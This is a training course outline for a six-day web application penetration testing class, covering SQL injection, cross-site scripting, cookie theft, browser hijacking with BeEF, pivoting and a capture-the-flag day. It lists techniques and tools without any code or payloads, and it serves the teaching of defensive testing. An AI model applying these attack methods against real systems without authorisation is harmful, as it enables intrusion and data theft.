Web App Penetration Testing and Ethical Hacking

Overview

Assess Your Web Apps in Depth

Web applications are a major point of vulnerability in organizations today. Web app holes have resulted in the theft of millions of credit cards, major financial and reputational damage for hundreds of enterprises, and even the compromise of thousands of browsing machines that visited Web sites altered by attackers. In this intermediate to advanced level class, you'll learn the art of exploiting Web applications so you can find flaws in your enterprise's Web apps before the bad guys do. Through detailed, hands-on exercises and training from a seasoned professional, you will be taught the four-step process for Web application penetration testing. You will inject SQL into back-end databases, learning how attackers exfiltrate sensitive data. You will utilize Cross-Site Scripting attacks to dominate a target infrastructure in our unique hands-on laboratory environment. And you will explore various other Web app vulnerabilities in depth with tried-and-true techniques for finding them using a structured testing regimen. You will learn the tools and methods of the attacker, so that you can be a powerful defender.

On day one, we will study the attacker's view of the Web as well as learn an attack methodology and how the pen-tester uses JavaScript within the test. On day two, we will study the art of reconnaissance, specifically targeted to Web applications. We will also examine the mapping phase as we interact with a real application to determine its internal structure. During day three we will continue our test by starting the discovery phase using the information we gathered on day two. We will focus on application/server-side discovery. On day four we will continue discovery, focusing on client-side portions of the application, such as Flash objects and Java applets. On day five, we will move into the final stage of exploitation. Students will use advanced exploitation methods to gain further access within the application. Day six will be a Capture the Flag event where the students will be able to use the methodology and techniques explored during class to find and exploit the vulnerabilities within an intranet site.

Throughout the class, you will learn the context behind the attacks so that you intuitively understand the real-life applications of our exploitation. In the end, you will be able to assess your own organization's Web applications to find some of the most common and damaging Web application vulnerabilities today.

By knowing your enemy, you can defeat your enemy. General security practitioners, as well as Web site designers, architects, and developers, will benefit from learning the practical art of Web application penetration testing in this class.

Sampling of Topics

• Topics Covered
  • Explore methods to zombify browsers
  • Discuss using zombies to port scan or attack internal networks
  • Explore attack frameworks
    • AttackAPI
    • BeEF
    • XSS-Proxy
  • Walk through an entire attack scenario
  • Exploit the various vulnerabilities discovered
  • Leverage the attacks to gain access to the system
  • Learn how to pivot our attacks through a Web application
  • Understand methods of interacting with a server through SQL injection
  • Exploit applications to steal cookies
  • Execute commands through Web application vulnerabilities

Laptop

Minimum hardware requirements:

• 1GHz processor
• 512MB RAM (1+GB highly recommended)
• 5GB free hard disk space
• CD ROM drive

A laptop with Windows 2000, XP, or Vista is required with the latest Service Packs and patches. Windows XP Pro is preferred, but Windows XP Home should work. Do not use server OSes such as Windows 2000 Server or Windows 2003 Server. Please install the following software on the computer:

• VMWare Player 2.x or VMWare Workstation 6.x or newer (Server and ESX are not supported)
• Firefox browser (latest version)

Apple laptops are also supported. The student must install VMWare Fusion 2.x and UnrarX.

You must have ability to disable the host firewall (Windows firewall or other third party firewall) and antivirus running on your desktop. This usually means you need to have administrative privilege on the machine.

DO NOT plan on just killing your antivirus service or processes, because most antivirus tools still function even when their associated services and processes have been terminated.

Day Information

Day 1

Web App Penetration Testing and Ethical Hacking: The Attacker's View of the Web

Understanding the attacker's perspective is key to successful Web application penetration testing. We will begin by thoroughly examining Web technology, including protocols, languages, clients, and server architectures, from the attacker's perspective. In this portion of the class we will also examine different authentication systems, including Basic, Digest, Forms, and Windows Integrated authentication, and discuss how servers use them and how attackers abuse them.

Following this, we will discuss the four steps that make up our process for conducting Web application penetration tests: reconnaissance, mapping, discovery and exploitation. During the next few days, we will delve into each of these steps more deeply. For the first day, we will review the fundamental principles of each phase and discuss how we will use them together as a cyclical attack process. Next, we will cover the types of penetration testing and what pieces need to be part of the report. As the final part of the day, we will explore and learn JavaScript from an attacker's perspective.

• Topics Covered
  • Overview of the Web from a penetration tester’s perspective
  • Exploring the various servers and clients
  • Discussion of the various Web architectures
  • Discover how session state works
  • Discussion of the different types of vulnerabilities
  • Define a Web application test scope and process
  • Define types of penetration testing

Day 2

Web Penetration Testing and Ethical Hacking: Reconnaissance and Mapping

On the second day we will start the actual penetration testing process, beginning with the reconnaissance and mapping phases. Reconnaissance includes gathering publicly available information regarding the target application and organization, identifying the machines which support our target application, and building a profile of each server, including operating system, specific software, and configuration. Our discussion will be augmented by practical, hands-on exercises in which we conduct reconnaissance against an in-class target.

In the mapping phase, we will build a map or diagram of the application. In order to do this, we identify the components, analyze the relationship between them, and determine how the pieces work together. We will specifically consider how the session management system works within an application. This will help us identify potential vulnerabilities during the next sections.

• Topics Covered
  • Discover the infrastructure within the application
  • Identify the machines and operating systems
  • SSL configurations and weaknesses
  • Explore virtual hosting and its impact on testing
  • Learn methods to identify load balancers
  • Software configuration discovery
  • Explore external information sources
  • Google hacking
  • Learn tools to spider a Web site
  • Scripting to automate Web requests and spidering
  • Application flow charting
  • Relationship analysis within an application
  • JavaScript for the attacker

Day 3

Web Penetration Testing and Ethical Hacking: Server-Side Discovery

In this section, we will continue to explore our methodology with the discovery phase. We will build upon the information started yesterday, exploring methods to find and verify vulnerabilities within the application. The students will also begin to explore the interactions between the various vulnerabilities.

After we cover vulnerabilities, we will explore the different user interfaces that Web apps expose to clients. This will include an exploration of various automated and manual tools, such as w3af, Burp Suite, and the SamuraiWTF pen-testing environment.

Throughout the discovery phase, we will explore both manual and automated methods of discovering vulnerabilities within applications and discuss the circumstances under which each is appropriate.

• Topics Covered
  • Learn methods to discover various vulnerabilities
    • Information leakage
    • Username harvesting
    • Command injection
    • SQL injection
    • Blind SQL injection
    • Cross-Site Scripting (XSS)
    • Cross-Site Request Forgery
    • Session issues
  • Explore differences between different data back-ends
  • Explore fuzzing and various fuzzing tools
  • Discuss the different interfaces Web sites contain
  • Understand methods for attacking Web services

Day 4

Web Penetration Testing and Ethical Hacking: Client-Side Discovery

On day four students will start exploring client side portions of the Web site. We will cover methods to discover vulnerabilities within client-side code, such as Java applets and Flash objects. We will learn how to use tools to decompile the objects and applets to find vulnerabilities. Tools such as Flare and JAD will be used during hands-on exercises. This will include a detailed discussion of Web Services and AJAX in which we will explore how AJAX and Web service technology enlarge the attack surface that penetration testers leverage. We will also explore the how AJAX and Web services are affected by the vulnerabilities already explored.

Students will also be able to understand the ways that these client-side components can be used to attack other portions of the network and Web application. Students will also be using various tools and methods to discover ways to interact with Web applications bypassing these client-side controls.

Students will also work through sections on both Python and PHP. These sections focus on the use of these languages during a penetration test and from the view of an attacker.

• Topics Covered
  • Learn methods to discover various vulnerabilities
    • Information leakage
    • Username harvesting
    • Command injection
    • SQL injection
    • Blind SQL injection
    • Cross-Site Scripting (XSS)
    • Cross-Site Request Forgery
  • Learn methods to decompile client-side code
    • Flash
    • Java
    • etc.
  • Explore malicious applets and objects
  • Discovery vulnerabilities in Web application through their client components
  • Understand methods for attacking Web services
  • Understand methods for testing Web 2.0 and AJAX based sites
  • Learn how AJAX and Web services change penetration tests
  • Learn the attacker’s perspective on Python and PHP
    • The use of these languages during our attack
    • The ability to expand the tools we are using

Day 5

Web Penetration Testing and Ethical Hacking: Exploitation

On the fifth day we will launch actual exploits against real-world applications. In this component, we will build upon the previous three steps, expanding our foothold within the application and extending that to the network on which it resides. As penetration testers, we will specifically focus on ways that we can leverage previously discovered vulnerabilities to gain further access, highlighting the cyclical nature of our four-step attack methodology.

During our exploitation, we will use tools such as the Burp Suite and Paros Proxy to assist us in crafting exploits against real-world applications like Wordpress and AWStats. We will launch an SQL injection attack against Wordpress, intercepting real transactions and modifying them. We will use Cross-Site Scripting attacks against phpMyAdmin and phpBB to steal cookies and sessions from other users.

We are also going to explore the use of attack frameworks, such as AttackAPI and BeEF. We will discuss how the frameworks can assist us in our testing process, gaining access to browser history, port scanning internal networks, and searching for other vulnerable Web applications through zombie browsers.

We will also explore multiple exploit attacks. This is where the student will build complex attack series to gain much greater access within the Web applications. By fully uncovering vulnerabilities within applications using the same resources as attackers, we can provide organizations with the best assessment possible.

• Topics Covered
  • Explore methods to zombify browsers
  • Discuss using zombies to port scan or attack internal networks
  • Explore attack frameworks
    • AttackAPI
    • BeEF
    • XSS-Proxy
  • Walk through an entire attack scenario
  • Exploit the various vulnerabilities discovered
  • Leverage the attacks to gain access to the system
  • Learn how to pivot our attacks through a Web application
  • Understand methods of interacting with a server through SQL injection
  • Exploit applications to steal cookies
  • Execute commands through Web application vulnerabilities

Day 6

Web Penetration Testing and Ethical Hacking: Capture the Flag

During day six of the class students will be placed on a network and given the opportunity to complete an entire penetration test. The goal of this capture the flag event is for the students to explore the techniques, tools, and methodology they have learned over the last five days. They will be able to use these ideas and methods against a realistic intranet application. At the end of the day, they will provide a verbal report of the findings and methodology they followed to complete the test.

Students will be provided with a virtual machine that contains the SamuraiWTF Web penetration testing environment. They will be able to use this both in the class and after leaving and returning to their normal jobs.